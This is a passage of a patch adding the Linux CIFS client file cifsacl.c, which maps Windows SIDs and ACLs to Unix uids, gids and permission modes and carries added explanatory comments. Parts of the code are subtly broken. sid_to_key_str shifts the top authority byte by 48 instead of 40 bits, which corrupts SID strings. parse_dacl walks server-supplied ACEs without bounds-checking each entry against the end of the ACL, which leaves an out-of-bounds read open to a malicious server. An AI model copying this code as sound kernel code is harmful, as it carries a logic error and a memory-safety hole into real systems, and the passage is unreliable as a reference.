++	{0x0380, 0x03ab, UniCaseRangeL0380},
++	{0x0400, 0x042f, UniCaseRangeL0400},
++	{0x0490, 0x04cb, UniCaseRangeL0490},
++	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
++	{0xff20, 0xff3a, UniCaseRangeLff20},
++	{0}
++};
++#endif
+diff --git a/fs/smb/client/cifsacl.c b/fs/smb/client/cifsacl.c
+new file mode 100644
+index 0000000000000..a6c7566a01821
+--- /dev/null
++++ b/fs/smb/client/cifsacl.c
+@@ -0,0 +1,1672 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2007,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Contains the routines for mapping CIFS/NTFS ACLs
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/string.h>
++#include <linux/keyctl.h>
++#include <linux/key-type.h>
++#include <keys/user-type.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsacl.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "fs_context.h"
++
++/* security id for everyone/world system group */
++static const struct cifs_sid sid_everyone = {
++	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
++/* security id for Authenticated Users system group */
++static const struct cifs_sid sid_authusers = {
++	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
++
++/* S-1-22-1 Unmapped Unix users */
++static const struct cifs_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-22-2 Unmapped Unix groups */
++static const struct cifs_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/*
++ * See https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++
++/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
++
++/* S-1-5-88-1 Unix uid */
++static const struct cifs_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-2 Unix gid */
++static const struct cifs_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-3 Unix mode */
++static const struct cifs_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++static const struct cred *root_cred;
++
++static int
++cifs_idmap_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
++{
++	char *payload;
++
++	/*
++	 * If the payload is less than or equal to the size of a pointer, then
++	 * an allocation here is wasteful. Just copy the data directly to the
++	 * payload.value union member instead.
++	 *
++	 * With this however, you must check the datalen before trying to
++	 * dereference payload.data!
++	 */
++	if (prep->datalen <= sizeof(key->payload)) {
++		key->payload.data[0] = NULL;
++		memcpy(&key->payload, prep->data, prep->datalen);
++	} else {
++		payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
++		if (!payload)
++			return -ENOMEM;
++		key->payload.data[0] = payload;
++	}
++
++	key->datalen = prep->datalen;
++	return 0;
++}
++
++static inline void
++cifs_idmap_key_destroy(struct key *key)
++{
++	if (key->datalen > sizeof(key->payload))
++		kfree(key->payload.data[0]);
++}
++
++static struct key_type cifs_idmap_key_type = {
++	.name        = "cifs.idmap",
++	.instantiate = cifs_idmap_key_instantiate,
++	.destroy     = cifs_idmap_key_destroy,
++	.describe    = user_describe,
++};
++
++static char *
++sid_to_key_str(struct cifs_sid *sidptr, unsigned int type)
++{
++	int i, len;
++	unsigned int saval;
++	char *sidstr, *strptr;
++	unsigned long long id_auth_val;
++
++	/* 3 bytes for prefix */
++	sidstr = kmalloc(3 + SID_STRING_BASE_SIZE +
++			 (SID_STRING_SUBAUTH_SIZE * sidptr->num_subauth),
++			 GFP_KERNEL);
++	if (!sidstr)
++		return sidstr;
++
++	strptr = sidstr;
++	len = sprintf(strptr, "%cs:S-%hhu", type == SIDOWNER ? 'o' : 'g',
++			sidptr->revision);
++	strptr += len;
++
++	/* The authority field is a single 48-bit number */
++	id_auth_val = (unsigned long long)sidptr->authority[5];
++	id_auth_val |= (unsigned long long)sidptr->authority[4] << 8;
++	id_auth_val |= (unsigned long long)sidptr->authority[3] << 16;
++	id_auth_val |= (unsigned long long)sidptr->authority[2] << 24;
++	id_auth_val |= (unsigned long long)sidptr->authority[1] << 32;
++	id_auth_val |= (unsigned long long)sidptr->authority[0] << 48;
++
++	/*
++	 * MS-DTYP states that if the authority is >= 2^32, then it should be
++	 * expressed as a hex value.
++	 */
++	if (id_auth_val <= UINT_MAX)
++		len = sprintf(strptr, "-%llu", id_auth_val);
++	else
++		len = sprintf(strptr, "-0x%llx", id_auth_val);
++
++	strptr += len;
++
++	for (i = 0; i < sidptr->num_subauth; ++i) {
++		saval = le32_to_cpu(sidptr->sub_auth[i]);
++		len = sprintf(strptr, "-%u", saval);
++		strptr += len;
++	}
++
++	return sidstr;
++}
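++
++/*
++ * For example, the well-known NFS mode SID S-1-5-88-3 with type SIDOWNER
++ * is rendered as the key description "os:S-1-5-88-3"; any other type
++ * yields the "gs:" prefix instead.
++ */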
++
++/*
++ * Compare two SIDs (each roughly equivalent to a UUID for a user or
++ * group). Returns zero if they are the same and non-zero if they differ.
++ */
++static int
++compare_sids(const struct cifs_sid *ctsid, const struct cifs_sid *cwsid)
++{
++	int i;
++	int num_subauth, num_sat, num_saw;
++
++	if ((!ctsid) || (!cwsid))
++		return 1;
++
++	/* compare the revision */
++	if (ctsid->revision != cwsid->revision) {
++		if (ctsid->revision > cwsid->revision)
++			return 1;
++		else
++			return -1;
++	}
++
++	/* compare all of the six auth values */
++	for (i = 0; i < NUM_AUTHS; ++i) {
++		if (ctsid->authority[i] != cwsid->authority[i]) {
++			if (ctsid->authority[i] > cwsid->authority[i])
++				return 1;
++			else
++				return -1;
++		}
++	}
++
++	/* compare all of the subauth values if any */
++	num_sat = ctsid->num_subauth;
++	num_saw = cwsid->num_subauth;
++	num_subauth = num_sat < num_saw ? num_sat : num_saw;
++	if (num_subauth) {
++		for (i = 0; i < num_subauth; ++i) {
++			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
++				if (le32_to_cpu(ctsid->sub_auth[i]) >
++					le32_to_cpu(cwsid->sub_auth[i]))
++					return 1;
++				else
++					return -1;
++			}
++		}
++	}
++
++	return 0; /* sids compare/match */
++}
++
++static bool
++is_well_known_sid(const struct cifs_sid *psid, uint32_t *puid, bool is_group)
++{
++	int i;
++	int num_subauth;
++	const struct cifs_sid *pwell_known_sid;
++
++	if (!psid || (puid == NULL))
++		return false;
++
++	num_subauth = psid->num_subauth;
++
++	/* check if Mac (or Windows NFS) vs. Samba format for Unix owner SID */
++	if (num_subauth == 2) {
++		if (is_group)
++			pwell_known_sid = &sid_unix_groups;
++		else
++			pwell_known_sid = &sid_unix_users;
++	} else if (num_subauth == 3) {
++		if (is_group)
++			pwell_known_sid = &sid_unix_NFS_groups;
++		else
++			pwell_known_sid = &sid_unix_NFS_users;
++	} else
++		return false;
++
++	/* compare the revision */
++	if (psid->revision != pwell_known_sid->revision)
++		return false;
++
++	/* compare all of the six auth values */
++	for (i = 0; i < NUM_AUTHS; ++i) {
++		if (psid->authority[i] != pwell_known_sid->authority[i]) {
++			cifs_dbg(FYI, "auth %d did not match\n", i);
++			return false;
++		}
++	}
++
++	if (num_subauth == 2) {
++		if (psid->sub_auth[0] != pwell_known_sid->sub_auth[0])
++			return false;
++
++		*puid = le32_to_cpu(psid->sub_auth[1]);
++	} else /* 3 subauths, i.e. Windows/Mac style */ {
++		if ((psid->sub_auth[0] != pwell_known_sid->sub_auth[0]) ||
++		    (psid->sub_auth[1] != pwell_known_sid->sub_auth[1]))
++			return false;
++
++		*puid = le32_to_cpu(psid->sub_auth[2]);
++	}
++
++	cifs_dbg(FYI, "Unix UID %d returned from SID\n", *puid);
++	return true; /* well known sid found, uid returned */
++}
++
++static __u16
++cifs_copy_sid(struct cifs_sid *dst, const struct cifs_sid *src)
++{
++	int i;
++	__u16 size = 1 + 1 + 6;
++
++	dst->revision = src->revision;
++	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
++	for (i = 0; i < NUM_AUTHS; ++i)
++		dst->authority[i] = src->authority[i];
++	for (i = 0; i < dst->num_subauth; ++i)
++		dst->sub_auth[i] = src->sub_auth[i];
++	size += (dst->num_subauth * 4);
++
++	return size;
++}
++
++static int
++id_to_sid(unsigned int cid, uint sidtype, struct cifs_sid *ssid)
++{
++	int rc;
++	struct key *sidkey;
++	struct cifs_sid *ksid;
++	unsigned int ksid_size;
++	char desc[3 + 10 + 1]; /* 3 byte prefix + 10 bytes for value + NULL */
++	const struct cred *saved_cred;
++
++	rc = snprintf(desc, sizeof(desc), "%ci:%u",
++			sidtype == SIDOWNER ? 'o' : 'g', cid);
++	if (rc >= sizeof(desc))
++		return -EINVAL;
++
++	rc = 0;
++	saved_cred = override_creds(root_cred);
++	sidkey = request_key(&cifs_idmap_key_type, desc, "");
++	if (IS_ERR(sidkey)) {
++		rc = -EINVAL;
++		cifs_dbg(FYI, "%s: Can't map %cid %u to a SID\n",
++			 __func__, sidtype == SIDOWNER ? 'u' : 'g', cid);
++		goto out_revert_creds;
++	} else if (sidkey->datalen < CIFS_SID_BASE_SIZE) {
++		rc = -EIO;
++		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
++			 __func__, sidkey->datalen);
++		goto invalidate_key;
++	}
++
++	/*
++	 * A sid is usually too large to be embedded in payload.value, but if
++	 * there are no subauthorities and the host has 8-byte pointers, then
++	 * it could be.
++	 */
++	ksid = sidkey->datalen <= sizeof(sidkey->payload) ?
++		(struct cifs_sid *)&sidkey->payload :
++		(struct cifs_sid *)sidkey->payload.data[0];
++
++	ksid_size = CIFS_SID_BASE_SIZE + (ksid->num_subauth * sizeof(__le32));
++	if (ksid_size > sidkey->datalen) {
++		rc = -EIO;
++		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu, ksid_size=%u)\n",
++			 __func__, sidkey->datalen, ksid_size);
++		goto invalidate_key;
++	}
++
++	cifs_copy_sid(ssid, ksid);
++out_key_put:
++	key_put(sidkey);
++out_revert_creds:
++	revert_creds(saved_cred);
++	return rc;
++
++invalidate_key:
++	key_invalidate(sidkey);
++	goto out_key_put;
++}
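++
++/*
++ * For example, mapping uid 1000 to a SID requests the key described as
++ * "oi:1000" from the cifs.idmap key type, which the userspace upcall is
++ * expected to instantiate with a struct cifs_sid payload.
++ */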
++
++int
++sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
++		struct cifs_fattr *fattr, uint sidtype)
++{
++	int rc = 0;
++	struct key *sidkey;
++	char *sidstr;
++	const struct cred *saved_cred;
++	kuid_t fuid = cifs_sb->ctx->linux_uid;
++	kgid_t fgid = cifs_sb->ctx->linux_gid;
++
++	/*
++	 * If we have too many subauthorities, then something is really wrong.
++	 * Just return an error.
++	 */
++	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
++		cifs_dbg(FYI, "%s: %u subauthorities is too many!\n",
++			 __func__, psid->num_subauth);
++		return -EIO;
++	}
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL) ||
++	    (cifs_sb_master_tcon(cifs_sb)->posix_extensions)) {
++		uint32_t unix_id;
++		bool is_group;
++
++		if (sidtype != SIDOWNER)
++			is_group = true;
++		else
++			is_group = false;
++
++		if (is_well_known_sid(psid, &unix_id, is_group) == false)
++			goto try_upcall_to_get_id;
++
++		if (is_group) {
++			kgid_t gid;
++			gid_t id;
++
++			id = (gid_t)unix_id;
++			gid = make_kgid(&init_user_ns, id);
++			if (gid_valid(gid)) {
++				fgid = gid;
++				goto got_valid_id;
++			}
++		} else {
++			kuid_t uid;
++			uid_t id;
++
++			id = (uid_t)unix_id;
++			uid = make_kuid(&init_user_ns, id);
++			if (uid_valid(uid)) {
++				fuid = uid;
++				goto got_valid_id;
++			}
++		}
++		/* If unable to find uid/gid easily from SID try via upcall */
++	}
++
++try_upcall_to_get_id:
++	sidstr = sid_to_key_str(psid, sidtype);
++	if (!sidstr)
++		return -ENOMEM;
++
++	saved_cred = override_creds(root_cred);
++	sidkey = request_key(&cifs_idmap_key_type, sidstr, "");
++	if (IS_ERR(sidkey)) {
++		cifs_dbg(FYI, "%s: Can't map SID %s to a %cid\n",
++			 __func__, sidstr, sidtype == SIDOWNER ? 'u' : 'g');
++		goto out_revert_creds;
++	}
++
++	/*
++	 * FIXME: Here we assume that uid_t and gid_t are same size. It's
++	 * probably a safe assumption but might be better to check based on
++	 * sidtype.
++	 */
++	BUILD_BUG_ON(sizeof(uid_t) != sizeof(gid_t));
++	if (sidkey->datalen != sizeof(uid_t)) {
++		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
++			 __func__, sidkey->datalen);
++		key_invalidate(sidkey);
++		goto out_key_put;
++	}
++
++	if (sidtype == SIDOWNER) {
++		kuid_t uid;
++		uid_t id;
++		memcpy(&id, &sidkey->payload.data[0], sizeof(uid_t));
++		uid = make_kuid(&init_user_ns, id);
++		if (uid_valid(uid))
++			fuid = uid;
++	} else {
++		kgid_t gid;
++		gid_t id;
++		memcpy(&id, &sidkey->payload.data[0], sizeof(gid_t));
++		gid = make_kgid(&init_user_ns, id);
++		if (gid_valid(gid))
++			fgid = gid;
++	}
++
++out_key_put:
++	key_put(sidkey);
++out_revert_creds:
++	revert_creds(saved_cred);
++	kfree(sidstr);
++
++	/*
++	 * Note that we return 0 here unconditionally. If the mapping
++	 * fails then we just fall back to using the ctx->linux_uid/linux_gid.
++	 */
++got_valid_id:
++	rc = 0;
++	if (sidtype == SIDOWNER)
++		fattr->cf_uid = fuid;
++	else
++		fattr->cf_gid = fgid;
++	return rc;
++}
++
++int
++init_cifs_idmap(void)
++{
++	struct cred *cred;
++	struct key *keyring;
++	int ret;
++
++	cifs_dbg(FYI, "Registering the %s key type\n",
++		 cifs_idmap_key_type.name);
++
++	/* create an override credential set with a special thread keyring in
++	 * which requests are cached
++	 *
++	 * this is used to prevent malicious redirections from being installed
++	 * with add_key().
++	 */
++	cred = prepare_kernel_cred(NULL);
++	if (!cred)
++		return -ENOMEM;
++
++	keyring = keyring_alloc(".cifs_idmap",
++				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
++				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
++				KEY_USR_VIEW | KEY_USR_READ,
++				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
++	if (IS_ERR(keyring)) {
++		ret = PTR_ERR(keyring);
++		goto failed_put_cred;
++	}
++
++	ret = register_key_type(&cifs_idmap_key_type);
++	if (ret < 0)
++		goto failed_put_key;
++
++	/* instruct request_key() to use this special keyring as a cache for
++	 * the results it looks up */
++	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
++	cred->thread_keyring = keyring;
++	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
++	root_cred = cred;
++
++	cifs_dbg(FYI, "cifs idmap keyring: %d\n", key_serial(keyring));
++	return 0;
++
++failed_put_key:
++	key_put(keyring);
++failed_put_cred:
++	put_cred(cred);
++	return ret;
++}
++
++void
++exit_cifs_idmap(void)
++{
++	key_revoke(root_cred->thread_keyring);
++	unregister_key_type(&cifs_idmap_key_type);
++	put_cred(root_cred);
++	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_idmap_key_type.name);
++}
++
++/* copy ntsd, owner sid, and group sid from a security descriptor to another */
++static __u32 copy_sec_desc(const struct cifs_ntsd *pntsd,
++				struct cifs_ntsd *pnntsd,
++				__u32 sidsoffset,
++				struct cifs_sid *pownersid,
++				struct cifs_sid *pgrpsid)
++{
++	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
++	struct cifs_sid *nowner_sid_ptr, *ngroup_sid_ptr;
++
++	/* copy security descriptor control portion */
++	pnntsd->revision = pntsd->revision;
++	pnntsd->type = pntsd->type;
++	pnntsd->dacloffset = cpu_to_le32(sizeof(struct cifs_ntsd));
++	pnntsd->sacloffset = 0;
++	pnntsd->osidoffset = cpu_to_le32(sidsoffset);
++	pnntsd->gsidoffset = cpu_to_le32(sidsoffset + sizeof(struct cifs_sid));
++
++	/* copy owner sid */
++	if (pownersid)
++		owner_sid_ptr = pownersid;
++	else
++		owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->osidoffset));
++	nowner_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset);
++	cifs_copy_sid(nowner_sid_ptr, owner_sid_ptr);
++
++	/* copy group sid */
++	if (pgrpsid)
++		group_sid_ptr = pgrpsid;
++	else
++		group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->gsidoffset));
++	ngroup_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset +
++					sizeof(struct cifs_sid));
++	cifs_copy_sid(ngroup_sid_ptr, group_sid_ptr);
++
++	return sidsoffset + (2 * sizeof(struct cifs_sid));
++}
++
++
++/*
++   Change the posix mode to reflect the permissions.
++   pmode is the existing mode (we only want to overwrite part of this).
++   The bits to set can be: S_IRWXU, S_IRWXG or S_IRWXO, i.e. 00700, 00070 or 00007.
++*/
++static void access_flags_to_mode(__le32 ace_flags, int type, umode_t *pmode,
++				 umode_t *pdenied, umode_t mask)
++{
++	__u32 flags = le32_to_cpu(ace_flags);
++	/*
++	 * Do not assume "preferred" or "canonical" order.
++	 * The first DENY or ALLOW ACE which matches perfectly is
++	 * the permission to be used. Once allowed or denied, same
++	 * permission in later ACEs do not matter.
++	 */
++
++	/* If not already allowed, deny these bits */
++	if (type == ACCESS_DENIED) {
++		if (flags & GENERIC_ALL &&
++				!(*pmode & mask & 0777))
++			*pdenied |= mask & 0777;
++
++		if (((flags & GENERIC_WRITE) ||
++				((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
++				!(*pmode & mask & 0222))
++			*pdenied |= mask & 0222;
++
++		if (((flags & GENERIC_READ) ||
++				((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
++				!(*pmode & mask & 0444))
++			*pdenied |= mask & 0444;
++
++		if (((flags & GENERIC_EXECUTE) ||
++				((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
++				!(*pmode & mask & 0111))
++			*pdenied |= mask & 0111;
++
++		return;
++	} else if (type != ACCESS_ALLOWED) {
++		cifs_dbg(VFS, "unknown access control type %d\n", type);
++		return;
++	}
++	/* else ACCESS_ALLOWED type */
++
++	if ((flags & GENERIC_ALL) &&
++			!(*pdenied & mask & 0777)) {
++		*pmode |= mask & 0777;
++		cifs_dbg(NOISY, "all perms\n");
++		return;
++	}
++
++	if (((flags & GENERIC_WRITE) ||
++			((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
++			!(*pdenied & mask & 0222))
++		*pmode |= mask & 0222;
++
++	if (((flags & GENERIC_READ) ||
++			((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
++			!(*pdenied & mask & 0444))
++		*pmode |= mask & 0444;
++
++	if (((flags & GENERIC_EXECUTE) ||
++			((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
++			!(*pdenied & mask & 0111))
++		*pmode |= mask & 0111;
++
++	/* If DELETE_CHILD is set only on an owner ACE, set sticky bit */
++	if (flags & FILE_DELETE_CHILD) {
++		if (mask == ACL_OWNER_MASK) {
++			if (!(*pdenied & 01000))
++				*pmode |= 01000;
++		} else if (!(*pdenied & 01000)) {
++			*pmode &= ~01000;
++			*pdenied |= 01000;
++		}
++	}
++
++	cifs_dbg(NOISY, "access flags 0x%x mode now %04o\n", flags, *pmode);
++	return;
++}
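++
++/*
++ * For example, an ACCESS_ALLOWED ACE carrying GENERIC_READ that matches
++ * the owner SID (mask 0700) sets 0400 in *pmode, unless an earlier DENY
++ * ACE already recorded 0400 in *pdenied.
++ */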
++
++/*
++   Generate access flags to reflect the permissions; mode is the existing
++   mode. This function is called for every ACE in the DACL whose SID
++   matches either the owner, the group or everyone.
++*/
++
++static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
++				__u32 *pace_flags)
++{
++	/* reset access mask */
++	*pace_flags = 0x0;
++
++	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
++	mode &= bits_to_use;
++
++	/* check for R/W/X (UGO) since we do not know whose flags
++	   these are, but we have already cleared all the bits except
++	   RWX for user, group or other as per bits_to_use */
++	if (mode & S_IRUGO)
++		*pace_flags |= SET_FILE_READ_RIGHTS;
++	if (mode & S_IWUGO)
++		*pace_flags |= SET_FILE_WRITE_RIGHTS;
++	if (mode & S_IXUGO)
++		*pace_flags |= SET_FILE_EXEC_RIGHTS;
++
++	cifs_dbg(NOISY, "mode: %04o, access flags now 0x%x\n",
++		 mode, *pace_flags);
++	return;
++}
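++
++/*
++ * For example, mode 0754 with bits_to_use == S_IRWXG keeps 0050, which
++ * sets SET_FILE_READ_RIGHTS and SET_FILE_EXEC_RIGHTS but not
++ * SET_FILE_WRITE_RIGHTS in *pace_flags.
++ */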
++
++static __u16 cifs_copy_ace(struct cifs_ace *dst, struct cifs_ace *src, struct cifs_sid *psid)
++{
++	__u16 size = 1 + 1 + 2 + 4;
++
++	dst->type = src->type;
++	dst->flags = src->flags;
++	dst->access_req = src->access_req;
++
++	/* Check if there's a replacement sid specified */
++	if (psid)
++		size += cifs_copy_sid(&dst->sid, psid);
++	else
++		size += cifs_copy_sid(&dst->sid, &src->sid);
++
++	dst->size = cpu_to_le16(size);
++
++	return size;
++}
++
++static __u16 fill_ace_for_sid(struct cifs_ace *pntace,
++			const struct cifs_sid *psid, __u64 nmode,
++			umode_t bits, __u8 access_type,
++			bool allow_delete_child)
++{
++	int i;
++	__u16 size = 0;
++	__u32 access_req = 0;
++
++	pntace->type = access_type;
++	pntace->flags = 0x0;
++	mode_to_access_flags(nmode, bits, &access_req);
++
++	if (access_type == ACCESS_ALLOWED && allow_delete_child)
++		access_req |= FILE_DELETE_CHILD;
++
++	if (access_type == ACCESS_ALLOWED && !access_req)
++		access_req = SET_MINIMUM_RIGHTS;
++	else if (access_type == ACCESS_DENIED)
++		access_req &= ~SET_MINIMUM_RIGHTS;
++
++	pntace->access_req = cpu_to_le32(access_req);
++
++	pntace->sid.revision = psid->revision;
++	pntace->sid.num_subauth = psid->num_subauth;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = psid->authority[i];
++	for (i = 0; i < psid->num_subauth; i++)
++		pntace->sid.sub_auth[i] = psid->sub_auth[i];
++
++	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
++	pntace->size = cpu_to_le16(size);
++
++	return size;
++}
++
++
++#ifdef CONFIG_CIFS_DEBUG2
++static void dump_ace(struct cifs_ace *pace, char *end_of_acl)
++{
++	int num_subauth;
++
++	/* validate that we do not go past end of acl */
++
++	if (le16_to_cpu(pace->size) < 16) {
++		cifs_dbg(VFS, "ACE too small %d\n", le16_to_cpu(pace->size));
++		return;
++	}
++
++	if (end_of_acl < (char *)pace + le16_to_cpu(pace->size)) {
++		cifs_dbg(VFS, "ACL too small to parse ACE\n");
++		return;
++	}
++
++	num_subauth = pace->sid.num_subauth;
++	if (num_subauth) {
++		int i;
++		cifs_dbg(FYI, "ACE revision %d num_auth %d type %d flags %d size %d\n",
++			 pace->sid.revision, pace->sid.num_subauth, pace->type,
++			 pace->flags, le16_to_cpu(pace->size));
++		for (i = 0; i < num_subauth; ++i) {
++			cifs_dbg(FYI, "ACE sub_auth[%d]: 0x%x\n",
++				 i, le32_to_cpu(pace->sid.sub_auth[i]));
++		}
++
++		/* BB add length check to make sure that we do not have huge
++			num auths and therefore go off the end */
++	}
++
++	return;
++}
++#endif
++
++static void parse_dacl(struct cifs_acl *pdacl, char *end_of_acl,
++		       struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
++		       struct cifs_fattr *fattr, bool mode_from_special_sid)
++{
++	int i;
++	int num_aces = 0;
++	int acl_size;
++	char *acl_base;
++	struct cifs_ace **ppace;
++
++	/* BB need to add parm so we can store the SID BB */
++
++	if (!pdacl) {
++		/* no DACL in the security descriptor, set
++		   all the permissions for user/group/other */
++		fattr->cf_mode |= 0777;
++		return;
++	}
++
++	/* validate that we do not go past end of acl */
++	if (end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
++		cifs_dbg(VFS, "ACL too small to parse DACL\n");
++		return;
++	}
++
++	cifs_dbg(NOISY, "DACL revision %d size %d num aces %d\n",
++		 le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
++		 le32_to_cpu(pdacl->num_aces));
++
++	/* reset rwx permissions for user/group/other.
++	   Also, if num_aces is 0 i.e. DACL has no ACEs,
++	   user/group/other have no permissions */
++	fattr->cf_mode &= ~(0777);
++
++	acl_base = (char *)pdacl;
++	acl_size = sizeof(struct cifs_acl);
++
++	num_aces = le32_to_cpu(pdacl->num_aces);
++	if (num_aces > 0) {
++		umode_t denied_mode = 0;
++
++		if (num_aces > ULONG_MAX / sizeof(struct cifs_ace *))
++			return;
++		ppace = kmalloc_array(num_aces, sizeof(struct cifs_ace *),
++				      GFP_KERNEL);
++		if (!ppace)
++			return;
++
++		for (i = 0; i < num_aces; ++i) {
++			ppace[i] = (struct cifs_ace *) (acl_base + acl_size);
++#ifdef CONFIG_CIFS_DEBUG2
++			dump_ace(ppace[i], end_of_acl);
++#endif
++			if (mode_from_special_sid &&
++			    (compare_sids(&(ppace[i]->sid),
++					  &sid_unix_NFS_mode) == 0)) {
++				/*
++				 * Full permissions are:
++				 * 07777 = S_ISUID | S_ISGID | S_ISVTX |
++				 *         S_IRWXU | S_IRWXG | S_IRWXO
++				 */
++				fattr->cf_mode &= ~07777;
++				fattr->cf_mode |=
++					le32_to_cpu(ppace[i]->sid.sub_auth[2]);
++				break;
++			} else {
++				if (compare_sids(&(ppace[i]->sid), pownersid) == 0) {
++					access_flags_to_mode(ppace[i]->access_req,
++							ppace[i]->type,
++							&fattr->cf_mode,
++							&denied_mode,
++							ACL_OWNER_MASK);
++				} else if (compare_sids(&(ppace[i]->sid), pgrpsid) == 0) {
++					access_flags_to_mode(ppace[i]->access_req,
++							ppace[i]->type,
++							&fattr->cf_mode,
++							&denied_mode,
++							ACL_GROUP_MASK);
++				} else if ((compare_sids(&(ppace[i]->sid), &sid_everyone) == 0) ||
++						(compare_sids(&(ppace[i]->sid), &sid_authusers) == 0)) {
++					access_flags_to_mode(ppace[i]->access_req,
++							ppace[i]->type,
++							&fattr->cf_mode,
++							&denied_mode,
++							ACL_EVERYONE_MASK);
++				}
++			}
++
++
++/*			memcpy((void *)(&(cifscred->aces[i])),
++				(void *)ppace[i],
++				sizeof(struct cifs_ace)); */
++
++			acl_base = (char *)ppace[i];
++			acl_size = le16_to_cpu(ppace[i]->size);
++		}
++
++		kfree(ppace);
++	}
++
++	return;
++}
++
++unsigned int setup_authusers_ACE(struct cifs_ace *pntace)
++{
++	int i;
++	unsigned int ace_size = 20;
++
++	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
++	pntace->flags = 0x0;
++	pntace->access_req = cpu_to_le32(GENERIC_ALL);
++	pntace->sid.num_subauth = 1;
++	pntace->sid.revision = 1;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] =  sid_authusers.authority[i];
++
++	pntace->sid.sub_auth[0] =  sid_authusers.sub_auth[0];
++
++	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
++	pntace->size = cpu_to_le16(ace_size);
++	return ace_size;
++}
++
++/*
++ * Fill in the special SID based on the mode. See
++ * https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++unsigned int setup_special_mode_ACE(struct cifs_ace *pntace, __u64 nmode)
++{
++	int i;
++	unsigned int ace_size = 28;
++
++	pntace->type = ACCESS_DENIED_ACE_TYPE;
++	pntace->flags = 0x0;
++	pntace->access_req = 0;
++	pntace->sid.num_subauth = 3;
++	pntace->sid.revision = 1;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = sid_unix_NFS_mode.authority[i];
++
++	pntace->sid.sub_auth[0] = sid_unix_NFS_mode.sub_auth[0];
++	pntace->sid.sub_auth[1] = sid_unix_NFS_mode.sub_auth[1];
++	pntace->sid.sub_auth[2] = cpu_to_le32(nmode & 07777);
++
++	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
++	pntace->size = cpu_to_le16(ace_size);
++	return ace_size;
++}
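++
++/*
++ * For example, nmode 0644 stores cpu_to_le32(0644) == 420 (decimal) in
++ * the third subauthority, producing the SID S-1-5-88-3-420 inside a
++ * zero-access-mask ACCESS_DENIED ACE that exists only to carry the mode.
++ */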
++
++unsigned int setup_special_user_owner_ACE(struct cifs_ace *pntace)
++{
++	int i;
++	unsigned int ace_size = 28;
++
++	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
